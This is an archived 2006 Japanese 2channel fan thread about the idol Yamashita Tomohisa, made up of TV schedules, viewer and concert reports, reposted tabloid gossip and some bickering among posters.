2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

308

1 :あったかーい:2006/12/23(土) 08:21:43 ID:yq02ydiM
ここはP本スレです
暫定処置としてスレタイを変更してスレ通し番号のみになっています

・他 タ レ 話 禁止 !・他スレ不干渉!
・sage進行
・実 況 禁 止 !(◇番組放送中は該当番組に関するレス一切禁止◇CMも同様!)
・雑談禁止
・無駄なマガ話・度を過ぎたプラベ詮索・花畑 禁止
・担決め・客・荒らし・釣り・安置はスルー
・AAage厨は随時通報
ttp://qb5.2ch.net/test/read.cgi/saku/1097478694/
・その他板全体のルールも遵守!!
以上破ったヤシは安置とみなす

前スレ【307】http://tv7.2ch.net/test/read.cgi/jr/1165973071/

2 :過去ログ:2006/12/23(土) 08:24:16 ID:yq02ydiM
1-300】ttp://jbbs.livedoor.jp/bbs/read.cgi/music/1521/1105007438/r163
【301】ttp://tv7.2ch.net/test/read.cgi/jr/1160486758/(06/10/10)
【302】ttp://tv7.2ch.net/test/read.cgi/jr/1161444143/(06/10/22)
【303】ttp://tv7.2ch.net/test/read.cgi/jr/1162202510/(06/10/30)
【304】ttp://tv7.2ch.net/test/read.cgi/jr/1163200398/(06/11/11)
【305】ttp://tv7.2ch.net/test/read.cgi/jr/1164203368/(06/11/22)
【306】ttp://tv7.2ch.net/test/read.cgi/jr/1165157281/(06/12/03)
【307】ttp://tv7.2ch.net/test/read.cgi/jr/1165973071/(06/12/13)


3 :ユー&名無しネ:2006/12/23(土) 08:36:58 ID:TiIu1U08
>1
乙カレー
苺ミルク飲む男らしいPモヘ

4 :ユー&名無しネ:2006/12/23(土) 08:41:29 ID:UZVTYUhm
>1
乙カレー
連れションする男らしいPモヘ


5 :ユー&名無しネ:2006/12/23(土) 08:46:08 ID:yq02ydiM
【 抜けてた
℃んくさスマソ

6 :ユー&名無しネ:2006/12/23(土) 08:55:17 ID:w533DJXo
>1
乙あたんしおん

7 :ユー&名無しネ:2006/12/23(土) 09:21:40 ID:/7+EEg6V
大ヒット中の映画「武士の一分」の原作となった文庫本「隠し剣 秋風抄」の推薦オビに
キムタクの写真掲載を拒否したジャニーズ事務所が、今度は光文社を標的にした。

同書は文芸春秋社から出版されている。
ジャニーズは文春とWホモセクハラ裁判”を闘った経緯があるだけに、
そのことが微妙に影響したとみられている。
ところが、だ。ジャニーズの矛先は文芸春秋社だけに向いているのではなかった。
スキャンダル記事の見せしめとして、光文社に対しても来年のジャニーズタレントの
カレンダー発売権利をストップさせていたのだ。

「光文社からここ数年、毎年ジャニーズ所属タレントのカレンダーが出ていたんですが、
それが来年の分は出ないんですよ」(出版関係者)

ジャニーズ所属タレントのカレンダーは、もともとは約6年にわたり
「主婦と生活者」が発売権利を持っていたが
「ジャニーズのライバルのアイドルの広告や記事を扱ったことで、いまは絶縁状態ですよ」(元女性誌記者)。
その間げきを突いて権利を得たのが、光文社だった。

「当時の、光文社から発行されている『女性自身』や写真誌『フラッシュ』は、
ジャニーズのタレントスキャンダル記事をほとんど扱わなかったんですが、
今年に入って『フラッシュ』がスクープ写真を掲載するなど雲行きが怪しくなっていた」(同)。
特に、人気グループ「KATーTUN」田中聖の“ラブホデート”は「かなりジャニーズを刺激したようで、
その後に出た、浜崎あゆみと長瀬智也のニューヨーク密会の記事がダメ押しになりましたね」(同)。

光文社の幹部社員は「ジャニーズタレントの来年のカレンダーは引き揚げられました。
スキャンダル記事の見せしめだと思いますよ」と認める。
キムタクの写真拒否にしろ、ジャニーズに出版会への圧力はとどまるところを知らないようだ。

8 :ユー&名無しネ:2006/12/23(土) 12:32:30 ID:xY+fdwuU
>1
乙!
きのうのタモステカックヨカッタヨ

9 :ユー&名無しネ:2006/12/23(土) 14:45:42 ID:rfkl0R3E
12月
23(土) 15:30〜 ぷれミーヤ!(白虎隊番宣)
      19:30〜21:00 少クラSP ※VTR
24(日) 4:50〜5:20 はい!テレビ朝日です(マグロ、白虎隊の裏舞台を紹介)
25(月) ムーブイケメン塾?
26(火) ぷっすまSP直前企画
27(水) ニコラ
31(日) 10:50〜 新春ドラマSP特集
      18:00〜 ドラえもん大晦日SP(VTR出演)
      牛紺
1月
2(火) 21:00〜23:30 ぷっスマ!新春SP(ビビリ王)
6(土) 10:55〜11:45 今夜白虎隊
     15:00〜16:25 ぷれミーヤSP
     18:30〜20:54 細木番組
     21:00〜23:25 白虎隊 第一夜
7(日) 15:30〜16:00 白虎隊裏話
     21:00〜23:25 白虎隊 第二夜

12/25のムーブは自分関東だからわからんが下旬に出ると言ってたよね?

10 :ユー&名無しネ:2006/12/23(土) 21:34:59 ID:pHNP+yHB
>1
乙〜食いキャラP

11 :ユー&名無しネ:2006/12/23(土) 21:41:46 ID:6RaxhUzs
>1
乙華麗P
タモステSPリピしまくり
大好きです!っていいなぁ福山さん

12 :ユー&名無しネ:2006/12/23(土) 22:01:17 ID:6RaxhUzs
プレミーヤレポdです
モゴモゴP禿ミタス
少蔵どの時のPも大好き

13 :ユー&名無しネ:2006/12/23(土) 22:08:37 ID:lU2MLcPx
>1

智久呼びしてみたい

14 :ユー&名無しネ:2006/12/23(土) 22:23:21 ID:rf+JKJWS
>1
乙カレー

タモステのサラ髪P最強だし少倉もウマーだたし
音楽戦士のビズもイイしモゴPもキャワだし
やっぱ露出あるとタノスイな

15 :ユー&名無しネ:2006/12/23(土) 22:42:52 ID:/xAePXrc
>1
乙です♪

16 :ユー&名無しネ:2006/12/23(土) 23:41:47 ID:D1s8gsd9
>15
♪はヤメレ

髪長いままだと大人ぽいんだが白虎隊になるとチビP思い出す

17 :ユー&名無しネ:2006/12/23(土) 23:55:09 ID:IExD+eH9
>1
乙カレー

これからイパーイ露出wktk

18 :ユー&名無しネ:2006/12/24(日) 00:04:40 ID:4WO1Px9+
忘年会でやっとプレミーヤと少クラ見れた
プレミーヤどんなにグダグダなのかと心配してたけど肉の感想とか待遇とか
女に対する積極性とか素でカワユスだし萌えすぎですた
少クラPあんまり期待しなかったのに過去から現在のPが見れて
ありがたやナムナムと拝まずにはいられなかったとです

19 :ユー&名無しネ:2006/12/24(日) 00:06:36 ID:g584Dd70
うぃーってやったって文はわかりにくい(w
てかうぃーは今更並んでも(ry

20 :ユー&名無しネ:2006/12/24(日) 00:11:07 ID:Udzwa811
Pがうぃーやるとこ見てみたい
発売日じゃないんだし朝から並ぶ人なんているのか?

21 :ユー&名無しネ:2006/12/24(日) 00:11:27 ID:hn8+0+HP
どんなタイプが好きかとかどうでもいいから
何で振られたのかを聞けっていう(wそっちの方が面白いのに

Pがうぃーに並んだらエラい事になるな

22 :ユー&名無しネ:2006/12/24(日) 00:12:03 ID:y8Hg6Dev
確かにメチャメチャ飛んでた(w
カッコヨスだたノシ

23 :ユー&名無しネ:2006/12/24(日) 00:12:08 ID:hABLhAQo
>9
d!
自分たこやきですがムーブのイケメン塾だっけ?
少倉ラブバツの激しいロックダンスPにモエス

24 :ユー&名無しネ:2006/12/24(日) 00:14:05 ID:xuT4k+BM
やまぴーを語れ(避難所)
http://jbbs.livedoor.jp/music/7762/yamap.html

雑談【6】
http://jbbs.livedoor.jp/bbs/read.cgi/music/7762/1159457228/

提案3
http://jbbs.livedoor.jp/bbs/read.cgi/music/7762/1157093814/

25 :ユー&名無しネ:2006/12/24(日) 00:18:41 ID:0oKgUiUu
蜂祭で升とどこかよそよそしくてハラハラしたのに
メールもらえるまで打解けてきたんだ
音楽戦士は自分も出るからってのもあったんだろうけど(w
今日の有楽町ビッグカメラはうぃーに長蛇の列が出来てたよ

26 :ユー&名無しネ:2006/12/24(日) 00:20:16 ID:g584Dd70
未だに並んでるのか
今日はP担は早起きしないと

24(日)
4:50〜5:20 はい!テレビ朝日です(マグロ、白虎隊の裏舞台を紹介)

27 :ユー&名無しネ:2006/12/24(日) 00:20:46 ID:41EYTFnj
出遅れた(*´∀`)
スパニエルPチャソ久しぶりに見たがカバエエな(*´∀`)
出会ったの(*´∀`)ノシ
ここんとこ体調悪くてダミだったけどPチャソみると
やっぱり元気になるダイスチPチャソ(*´∀`)

28 :ユー&名無しネ:2006/12/24(日) 00:21:26 ID:HFa7lx8Q
Pチャンキャワ

29 :ユー&名無しネ:2006/12/24(日) 00:21:29 ID:f0LLk5/F
最近は升とか石鹸麺の話がよく出てウレシス
Pこれからも石鹸話をヨロシク 安心するから

30 :ユー&名無しネ:2006/12/24(日) 00:23:34 ID:fL5smGse
前からちょこちょこ出してたと思うけどな
別の人の比重がそれよりやけに高かっただけで

31 :ユー&名無しネ:2006/12/24(日) 00:25:02 ID:xuT4k+BM
あびる優がゲットした大物アイドル (ゲンダイネット)

あびる優(20)が「やった!」と叫んだかどうかは知らないが、
彼女が人気グループ「NEWS]の山下智久(21)をゲットしたことで話題騒然だ。

あびるに以前の笑顔が戻ったのはごく最近のことだ。
昨冬の窃盗告白騒動で一気に出番がなくなり、タレント生命が危ぶまれたほどだった。
そんな状況が一変したのは9月に放送されたテレビ朝日の番組企画「100キロマラソン」がキッカケだった。
あびるは今月掲載された本紙の連載コラム「リセット完了!」でも「一から出直すつもりでいる」と語った。

そのあびるが交際している山下は、先ごろ活動休止会見を開いた
「KAT―TUN」の赤西仁や亀梨和也以上に将来を期待されている人気アイドルだ。

発売中の「週刊文春」によれば、
2人は9月上旬に縁結びで有名な京都の地主神社を参拝しているところを見られ、
10月上旬には那覇市内の薄暗いバーなどでも目撃されたという。

「あびるといえば、ISSAやロンブーの淳との交際が有名です。
今回の山下は“山P”といわれて歌もドラマもヒットさせているビッグなアイドルで、
これまでの相手と比べものにならないくらいインパクトが強烈。
彼はジャニー喜多川氏のお気に入りで、熱狂的なファンが多いだけに、周囲の反発が怖いですね」(芸能関係者)

あびるは転んでもタダでは起きなかった。


32 :ユー&名無しネ:2006/12/24(日) 00:25:53 ID:d6ON8gAL
ポップアップはかっこよかったよP


33 :ユー&名無しネ:2006/12/24(日) 00:29:26 ID:srv9sd2a
>26アリガトン

34 :ユー&名無しネ:2006/12/24(日) 00:46:00 ID:DgyaNv2F
うぃーって言うPがカワエエ
手に入れたら報告してくれP

35 :ユー&名無しネ:2006/12/24(日) 00:49:13 ID:KjLKU4me
昔からポップアップの登場はカコイイよね
Pはまあいろいろ欠けてる部分もあるけど
$としてのパフォーマンスの上手さ、キめてみせるところはいいなあと思う

36 :ユー&名無しネ:2006/12/24(日) 01:01:58 ID:Lp5UTvJX
以前ここで阪急梅田駅がP一色だって言ってた姐さんいませんか?
いつもはJR組の自分だけど明日見に行くつもりです
駅構内に入らないと見れないのかな?

37 :ユー&名無しネ:2006/12/24(日) 01:03:21 ID:g584Dd70
福山Pktkr
もてあそぶPとか福山さんの妄想スゴス(w

38 :ユー&名無しネ:2006/12/24(日) 01:05:21 ID:HFa7lx8Q
ましゃ塩萌
相思相愛マシャP

39 :ユー&名無しネ:2006/12/24(日) 01:06:33 ID:xuT4k+BM
氏ねキモヲタ

40 :ユー&名無しネ:2006/12/24(日) 01:07:14 ID:Jhz2ASAk
>37>38
聞き逃した
kwsk

41 :ユー&名無しネ:2006/12/24(日) 01:07:36 ID:HFa7lx8Q
>36
改札口から双眼鏡で見るとか…?ちょっと苦しいかも

42 :ユー&名無しネ:2006/12/24(日) 01:09:18 ID:CRdjySSg
>36
改札通ってホームマデ見に行った方がイイ
自分150円の入場券買って入った(W

43 :ユー&名無しネ:2006/12/24(日) 01:09:55 ID:/0IaIFJS
>37-38
d
レポお願いできませんか?

44 :ユー&名無しネ:2006/12/24(日) 01:11:05 ID:HFa7lx8Q
>40
リハの時にこないだのメールの件聞いたらそっけなくて
もしかして俺ヤマピーにもてあそばれてる?!って妄想してた(w
相思相愛ってひやかされてた

45 :ユー&名無しネ:2006/12/24(日) 01:13:09 ID:p5LStYol
福山さんて思考回路が結構乙女(w

46 :ユー&名無しネ:2006/12/24(日) 01:16:30 ID:Udzwa811
皆の前では話さないとか遊ばれてるとかワロス

47 :ユー&名無しネ:2006/12/24(日) 01:21:52 ID:HFa7lx8Q
勿論福山さん大人だからPが緊張してるだけって解かってるうえでの妄想だよ
しかしタモステは福山Pスチだね(w

48 :ユー&名無しネ:2006/12/24(日) 01:24:33 ID:xuT4k+BM
わかったから氏ねよキモヲタ

49 :ユー&名無しネ:2006/12/24(日) 01:25:41 ID:Jhz2ASAk
>44
d!d!
福山さんPのこと気にしてくれててウレシス

50 :ユー&名無しネ:2006/12/24(日) 01:25:48 ID:/0IaIFJS
>44
d
妄想福山さんワロス
福山Pイイナ

51 :ユー&名無しネ:2006/12/24(日) 01:26:26 ID:KjLKU4me
ましゃ兄の冗談のネタにしてもらえるだけで嬉しいね
あと、Pファソの間では
福山さんは「福山様」と呼ばれていてほとんど神の領域らしい(w
とかふざけて話してた

52 :ユー&名無しネ:2006/12/24(日) 01:37:41 ID:zfalGeGr
じゃあこれから福山様と呼ぼうか

53 :ユー&名無しネ:2006/12/24(日) 01:41:36 ID:LU03jQeb
>44
レポdです
福山サンいつもありがとう

54 :ユー&名無しネ:2006/12/24(日) 01:55:51 ID:/MP1OmR8
こんばちわ!福山ヲタです
つかもうレポ落ちてましたね
リハの時にPサンが隣にいてくれたって言ってましたw
福山はかなり本番緊張してたみたいで話し相手になっていただいてdですた

55 :ユー&名無しネ:2006/12/24(日) 01:58:30 ID:KjLKU4me
>54
いらっさいノシ
昨日のMステで福山Pが隣同士だったのを見て
Pファソで魂ラジをチェックした人が多かったみたいです
でも追加話(w アリガトンです

56 :ユー&名無しネ:2006/12/24(日) 02:02:52 ID:/MP1OmR8
>55
今年はメル友が出来てヨカタと言ってましたw
来年もヨロシクお願いします

57 :ユー&名無しネ:2006/12/24(日) 02:19:06 ID:ep5iO9rk
>36
中に入ったら円柱の巨大Pポスターに触れる
去年のは手を重ねたりできた
キモくてスマン

58 :ユー&名無しネ:2006/12/24(日) 02:57:03 ID:HFa7lx8Q
Pファンはマシャの事福山様と呼び神の域とのお便りに対して「神より総裁のほうがいい」
東すぽあたりにほも疑惑書かれそうな勢いで相思相愛
OPでは隣に並んだけど本番中に馴れ馴れしく話すのは嫌らしいので本番では
会話してないけど本番前のリハの時はとなりにPが来てくれてそのとき話した
前回小池くんの件でPに嫉妬させちゃったかなと気にしていた総裁
返事こなかった件を聞くとPに「え?そうでしたっけ??」と言われ総裁動揺(w
好きって言ってるくせに目の前ではそんなそぶりも見せてくれないPに遊ばれてんじゃないかと妄想
はからずもミルクティーの歌が俺たちの気持ちを表してた!みたいな感じですた
返事の件は忙しかったんじゃない?という結論に落ち着いてたけど
たぶん不思議チャンPが素でど忘れしてたんだろな…

59 :ユー&名無しネ:2006/12/24(日) 03:01:11 ID:HFa7lx8Q
リロしてなかったのでレポ被りスイマセン
OPの並びテラモエス

60 :ユー&名無しネ:2006/12/24(日) 05:23:28 ID:RCS/l1qu
はいテレ朝なかなかウマーな番宣だったな

61 :ユー&名無しネ:2006/12/24(日) 05:28:28 ID:7nfHgyY0
早起きして見たよ
Pコメあったし舞台裏や予告映像もいっぱい流れてウマー

62 :ユー&名無しネ:2006/12/24(日) 05:32:11 ID:v5Afyfar
細木センセイの番組予告にもちらっと写ってたな
ちゃっかり隣に座らせられ手握られて苦笑いのP(w


63 :ユー&名無しネ:2006/12/24(日) 05:40:37 ID:7o5VLZkL
>58
d
ヤパーリP忘れてたんだな(w
そうでしたっけ?ワロス
>62
Pの手握るなんて数子反則だよ

64 :ユー&名無しネ:2006/12/24(日) 05:47:47 ID:l/8qLLJi
ふんどし姿に霧吹きで水吹き付けられて寒そうだったな
殺陣の筋肉痛話をするPカバエエかった

65 :ユー&名無しネ:2006/12/24(日) 05:51:41 ID:pYbgvpS5
手握られたのか(w
何かと触られるなPは
そういうの気に止めなそうだもんな


66 :ユー&名無しネ:2006/12/24(日) 05:57:00 ID:EHGn1siv
目が覚めたのさっきで録画もダメでショック
どなたかレポお願いシマス orz

67 :ユー&名無しネ:2006/12/24(日) 06:21:14 ID:Udzwa811
はいテレ朝ウマー
ミシュツ映像多かった
Pオムのコメは多分ガイシュツの
現代役の服着た2人がWSでコメしたやつ
細木番組も少し映り細木の隣にいて手持ち上げられてた

68 :ユー&名無しネ:2006/12/24(日) 06:31:44 ID:EHGn1siv
>67
d!裏山〜です
手を持ち上げられる場面楽しみ

69 :ユー&名無しネ:2006/12/24(日) 07:18:31 ID:MnyAqW12
今録画見たが細木先生Pのお手握ってて裏山裏山裏山

70 :ユー&名無しネ:2006/12/24(日) 07:58:22 ID:Udzwa811
あと最初の頃勘違いしてたが血はいてるのは他タレだな

71 :ユー&名無しネ:2006/12/24(日) 08:07:02 ID:YHOiR0ab
滝の次にPか
細木やるな

72 :ユー&名無しネ:2006/12/24(日) 08:15:32 ID:9SLWqKlh
TBSの滝と細木の新春SPずばりいうわよの収録レポブログにあったのはこの番組の話だな
細木さんにかわいいわね良い子ねとべた褒めされるP
そうとう気に入られたようだな

73 :ユー&名無しネ:2006/12/24(日) 08:39:14 ID:b+qKU/ew
細木番組Pは黒ジャケGパンに外はねクルクルヘアーで
カッコカバエエな楽しみだ
ふんどしの霧吹きで水かけられるとこ
先にオムがかけられててそれを見て爆笑するPもカバエかった

74 :ユー&名無しネ:2006/12/24(日) 08:40:48 ID:pYbgvpS5
かわいい子ねってワロタ


75 :ユー&名無しネ:2006/12/24(日) 08:41:35 ID:hyus61Xx
>58
レポd
マシャ兄の妄想ワロタ
素で忘れてたっぽいPにモヘ(w


76 :ユー&名無しネ:2006/12/24(日) 08:47:44 ID:C0c1Kt8i
>58
福山のこと福山様とか神なんて呼んだ覚えはないのだが…
誰だよそんなハガキ出したお調子者は(w
このスレの住人か?

77 :ユー&名無しネ:2006/12/24(日) 09:03:20 ID:hn8+0+HP
テレ朝番宣で容赦なく水掛けててワロス
新春スペシャルっておk出るまでに何度かは噛んでるっぽい

78 :ユー&名無しネ:2006/12/24(日) 09:11:16 ID:QwHfEj5a
ウーンなんかリアルに福山さんが怖くなってきたカモ

79 :ユー&名無しネ:2006/12/24(日) 09:25:52 ID:XhIrMkjY
最初はちゃんとゲスト席にいたのにな(w
次映った時には細木の隣でビツクリだよ

気に入られたとか可愛がられてるとか
そういうレスはきもくなりがち
気を付けてクレ

80 :ユー&名無しネ:2006/12/24(日) 09:54:15 ID:MYBl6K0c
細木先生は気に入った子しか隣に座らせないよ
人に好かれることは悪いことじゃないし別にいいじゃないか

81 :ユー&名無しネ:2006/12/24(日) 09:54:22 ID:/0IaIFJS
>72
収録レポにあったということは
TBSでも滝との絡みでチラとPの話も
触れられるんだろうか

82 :ユー&名無しネ:2006/12/24(日) 09:58:00 ID:FwMGlcSH
話ブタぎってスマソ
Pのお宝フォトブック購入した姐さんいますか?

83 :ユー&名無しネ:2006/12/24(日) 09:58:05 ID:M4l9Ixgs


84 :ユー&名無しネ:2006/12/24(日) 10:01:57 ID:9SLWqKlh
細「他局であなたの後輩に会ったわよ〜かわいいわね」
滝「ええかわいいですよ」
細「良い子ね」
滝「ええ良い子ですよ」
TBS正月SP収録レポだが他局話だからカットされるかも
Pはやはり礼儀正しかったんだと思う

85 :ユー&名無しネ:2006/12/24(日) 10:01:59 ID:pAm3A98C
>81
オンエアは期待薄だとオモーが
でもほのかに期待

86 :ユー&名無しネ:2006/12/24(日) 10:02:42 ID:/0IaIFJS
>82
ブタ切りはかまわないけど
それは公式本じゃないから
ここではスルーしてホスイ
ブログ回れば詳細わかるとオモ

87 :ユー&名無しネ:2006/12/24(日) 10:05:01 ID:MYBl6K0c
スタッフブログより白虎隊映像完成したみたいだよ

88 :ユー&名無しネ:2006/12/24(日) 10:05:49 ID:YHOiR0ab
その収録レポて二度も滝にかわいいこね良い子ねて細木が言って
滝もかわいい良い子ですよて言ったやつだよね
相当だな(w

89 :ユー&名無しネ:2006/12/24(日) 10:09:32 ID:Iycn/JnT
ただ単に細木がボ(ry

90 :ユー&名無しネ:2006/12/24(日) 10:11:22 ID:9SLWqKlh
>88
そうデス
TBSのその番組は収録が2日間あって
1日目もその会話したのに2日目もまた同じ会話したそうだ


91 :36:2006/12/24(日) 11:09:53 ID:Lp5UTvJX
>41,42、57
遅くなったけどd
入場券買って今から巨大P堪能してきます

92 :ユー&名無しネ:2006/12/24(日) 11:09:55 ID:MYBl6K0c
>90
よっぽど気に入ったんだね先生は
好かれてよかったねPで終わらせとこ
気持ち悪いとか言う出す奴が出てくるから

93 :ユー&名無しネ:2006/12/24(日) 11:12:54 ID:7o5VLZkL
>80
79姐さんは少し気を付ければキモレス防げると言ってるだけデソ
若いイケ面が来れば誰でもカバエエ位は言われる
べた褒めとかそういうのはヤメレとオモー


94 :ユー&名無しネ:2006/12/24(日) 11:17:15 ID:xuT4k+BM

キティちゃん

80 名前:ユー&名無しネ[sage] 投稿日:2006/12/24(日) 09:54:15 ID:MYBl6K0c
細木先生は気に入った子しか隣に座らせないよ
人に好かれることは悪いことじゃないし別にいいじゃないか

87 名前:ユー&名無しネ[sage] 投稿日:2006/12/24(日) 10:05:01 ID:MYBl6K0c
スタッフブログより白虎隊映像完成したみたいだよ

92 名前:ユー&名無しネ[sage] 投稿日:2006/12/24(日) 11:09:55 ID:MYBl6K0c
>90
よっぽど気に入ったんだね先生は
好かれてよかったねPで終わらせとこ
気持ち悪いとか言う出す奴が出てくるから

95 :ユー&名無しネ:2006/12/24(日) 11:18:37 ID:x6MfeuOm
Pが本気を出すとヲタ萌度あがる
まったくじれったいのよ
ダイスチP

96 :ユー&名無しネ:2006/12/24(日) 11:21:14 ID:+40aeuTs
>92
オマイは空気嫁る迄少しロムって栗

97 :ユー&名無しネ:2006/12/24(日) 11:23:49 ID:hn8+0+HP
>92
ここの住人には細木が嫌いなヤツだっているだろうよ
全員がお前と同意見だと思うな

いい加減他タレ話ヤメロ

98 :ユー&名無しネ:2006/12/24(日) 11:23:56 ID:NIbFOijQ
別に福山キライじゃないけど二人で一つみたいな扱いウザイ
P担全てが様呼びしてるなんてヤメてくれ

99 :ユー&名無しネ:2006/12/24(日) 11:34:22 ID:Lp5UTvJX
自分の意見書くのはいいけど
それで他タレ批判するのは空気悪くなるからやめてね

100 :ユー&名無しネ:2006/12/24(日) 11:53:25 ID:0oKgUiUu
はいTV朝日です今みたよ
ふんどしの水吹きかけられて気合いれてるとこ萌!
ガタイいくてビックリ
細木に手組んでバンザイもワロス
あんなに遠かったのにもうあと13日で白虎隊なんだよね

101 :ユー&名無しネ:2006/12/24(日) 12:08:13 ID:pYbgvpS5
Pが年上の人に好かれるのは嬉しいよ


102 :ユー&名無しネ:2006/12/24(日) 12:21:02 ID:6FvV+TpZ
>100
あと13日か早いな
始まるまではwktkだけど
終わったらテラ寂しいんだよな

103 :ユー&名無しネ:2006/12/24(日) 12:30:41 ID:x6MfeuOm
Pスペシャル番組に出るのは嬉しいが編集に困るんだけど姐さんたちは番組全部残すのかな

104 :ユー&名無しネ:2006/12/24(日) 12:30:47 ID:ML+GvJTU
だね
次のお仕事は何

105 :ユー&名無しネ:2006/12/24(日) 12:45:45 ID:YHOiR0ab
あと2週間かあ
なんかあっという間だった
Pのガンガッタ成果をしっかり見なくては

106 :ユー&名無しネ:2006/12/24(日) 13:26:06 ID:rmUlEWZb
少倉見忘れた姐サン
BShiで今日再放送有

107 :ユー&名無しネ:2006/12/24(日) 13:38:00 ID:HFa7lx8Q
カバエさにハマった細木サンワロスだけど滝パパの溺愛もワロスだよね(w

108 :ユー&名無しネ:2006/12/24(日) 13:51:31 ID:+40aeuTs
>103
早送りマンドクセだからPのみで他カットするノシ

109 :ユー&名無しネ:2006/12/24(日) 16:02:55 ID:PIhv2/OI
〉99
お前もウルサイ

110 :ユー&名無しネ:2006/12/24(日) 16:04:16 ID:3UHcBytU
〉>>

111 :ユー&名無しネ:2006/12/24(日) 17:05:01 ID:hNYJKcXL
朝の番宣ガンガって早起きして見たよ
年上に好かれるPって人徳だな


112 :ユー&名無しネ:2006/12/24(日) 17:05:30 ID:Ei56EiZD
25日ムーブにP

113 :ユー&名無しネ:2006/12/24(日) 17:28:17 ID:A6mBzoyc
今からSTAND UP見る

114 :ユー&名無しネ:2006/12/24(日) 17:56:54 ID:uxmWUWKX
>106
トン

115 :ユー&名無しネ:2006/12/24(日) 18:06:40 ID:NVQ3VT0k
おれこれから福山様てよぶわw

116 :ユー&名無しネ:2006/12/24(日) 18:25:51 ID:iHGOz1Ti
滝つにPと友から連絡あり

117 :ユー&名無しネ:2006/12/24(日) 18:30:22 ID:Ad5PFJUN
センター席よりノシ
トナカイかぶりものとサンタ帽

118 :ユー&名無しネ:2006/12/24(日) 18:33:42 ID:0oKgUiUu
>116,117
よくわからんがPが滝つ紺に行ってるといいたいのか?
被り物でもしてるのか?

119 :ユー&名無しネ:2006/12/24(日) 18:40:41 ID:Udzwa811
2部に入ってるんでしょ
サンタとトナカイワロス
見たい

120 :ユー&名無しネ:2006/12/24(日) 18:43:45 ID:/0IaIFJS
>116-117
d
終って余裕があったら
レポ落としてくれると嬉しいです

121 :ユー&名無しネ:2006/12/24(日) 18:52:58 ID:xuT4k+BM
あびる優がゲットした大物アイドル (ゲンダイネット)

あびる優(20)が「やった!」と叫んだかどうかは知らないが、
彼女が人気グループ「NEWS]の山下智久(21)をゲットしたことで話題騒然だ。

あびるに以前の笑顔が戻ったのはごく最近のことだ。
昨冬の窃盗告白騒動で一気に出番がなくなり、タレント生命が危ぶまれたほどだった。
そんな状況が一変したのは9月に放送されたテレビ朝日の番組企画「100キロマラソン」がキッカケだった。
あびるは今月掲載された本紙の連載コラム「リセット完了!」でも「一から出直すつもりでいる」と語った。

そのあびるが交際している山下は、先ごろ活動休止会見を開いた
「KAT―TUN」の赤西仁や亀梨和也以上に将来を期待されている人気アイドルだ。

発売中の「週刊文春」によれば、
2人は9月上旬に縁結びで有名な京都の地主神社を参拝しているところを見られ、
10月上旬には那覇市内の薄暗いバーなどでも目撃されたという。

「あびるといえば、ISSAやロンブーの淳との交際が有名です。
今回の山下は“山P”といわれて歌もドラマもヒットさせているビッグなアイドルで、
これまでの相手と比べものにならないくらいインパクトが強烈。
彼はジャニー喜多川氏のお気に入りで、熱狂的なファンが多いだけに、周囲の反発が怖いですね」(芸能関係者)

あびるは転んでもタダでは起きなかった。


122 :ユー&名無しネ:2006/12/24(日) 20:24:43 ID:DgyaNv2F
Pの被り物はどっちだったんだろう?
日記楽しみ

123 :ユー&名無しネ:2006/12/24(日) 20:28:09 ID:Rn3i05av
PはBOXじゃなくてセンターにいるのか?
被り物バロス(w

124 :ユー&名無しネ:2006/12/24(日) 20:44:32 ID:woAS/1Ep
>58
亀だがレポd
総裁ワロス

125 :ユー&名無しネ:2006/12/24(日) 20:45:14 ID:Ad5PFJUN
自分何でセンターと言ったのかわからないスマソorz
P武威☆と2人でBOX席で見ていたところ
中盤MC前滝がスタ1前トロッコで通過する際紹介されて
滝にトナカイの被りモノ被せられてますた
センターステMCに☆と参加
その時にサンタ帽被って出てきた
白虎隊の番宣してますた
客席から「P下(呼び捨て)クリスマスの予定は?」の声にニガワラ
滝パパたちに「P下くんでしょ!」とフォローしてもらってた(w
MC後の皆で踊る曲でBOX席で立って参加

ざっとこんな感じ
長文ウザだったらスマソ

126 :ユー&名無しネ:2006/12/24(日) 20:46:21 ID:JvHFdcNl
なにこの長文頭おかしいんじゃね?

127 :ユー&名無しネ:2006/12/24(日) 20:49:26 ID:Rn3i05av
>125
レポd!

128 :ユー&名無しネ:2006/12/24(日) 20:53:42 ID:woAS/1Ep
>125
レポの長文は気にするなよ
dです
被り物ミタス

129 :ユー&名無しネ:2006/12/24(日) 20:57:08 ID:1k3Y9HK5


455 :ユーも名無しネ:2006/12/24(日) 20:50:18
ポークが京都ロケは寂しかったって言ってたお
滝にも「何度かメールしてきたから相当寂しいんだろうなと思った」
とか言われてたお


130 :ユー&名無しネ:2006/12/24(日) 20:58:39 ID:VXrxc5Ty
>125
速報と詳細ありがd
見れて裏山

131 :ユー&名無しネ:2006/12/24(日) 20:58:46 ID:DgyaNv2F
>125
d
トナカイもサンタもP被ったんだね
ノガワラのPも見たかった

132 :ユー&名無しネ:2006/12/24(日) 21:04:40 ID:n4L4iuv0
MC後の曲はライトあてられて踊ってたよ

133 :ユー&名無しネ:2006/12/24(日) 21:07:26 ID:l/8qLLJi
レポd!滝つ紺に登場とは…行けばよかったよ
サンタ帽P見たかったなあ

134 :131:2006/12/24(日) 21:08:48 ID:DgyaNv2F
ノガワラってなんだ自分
ニガワラでしたorz
>132
何って曲でしたか?

135 :ユー&名無しネ:2006/12/24(日) 21:14:40 ID:dYitfBpq
すみません、武威☆って誰ですか

136 :ユー&名無しネ:2006/12/24(日) 21:20:03 ID:LU03jQeb
>135
ちょっとロムって(w

137 :ユー&名無しネ:2006/12/24(日) 21:29:46 ID:JvHFdcNl
やまぴーを語れ(避難所)
http://jbbs.livedoor.jp/music/7762/yamap.html

雑談【6】
http://jbbs.livedoor.jp/bbs/read.cgi/music/7762/1159457228/

提案3
http://jbbs.livedoor.jp/bbs/read.cgi/music/7762/1157093814/

138 :ユー&名無しネ:2006/12/24(日) 21:46:42 ID:ODGXicuk
>125
レポd
トナカイP見たかったな

139 :ユー&名無しネ:2006/12/24(日) 22:41:38 ID:Ad5PFJUN
123じゃないけどPがピンスポ浴びて手拍子した曲は
Listen to the music(チトうろ覚えスマソ
トナカイ被ったのは愛シタガリだったとオモ
どっちもヲタも一緒に手振りとかする曲

140 :ユー&名無しネ:2006/12/24(日) 22:46:00 ID:FwMGlcSH
Pと☆は仲イイのか
なんか2人共舌ったらずというか鼻声な感じの話し方だからこの2人の会話を想像するとカワユスw

141 :ユー&名無しネ:2006/12/24(日) 22:48:24 ID:m10DtQVf
仲イイってかたまたま同じ時に見に行っただけじゃないか?
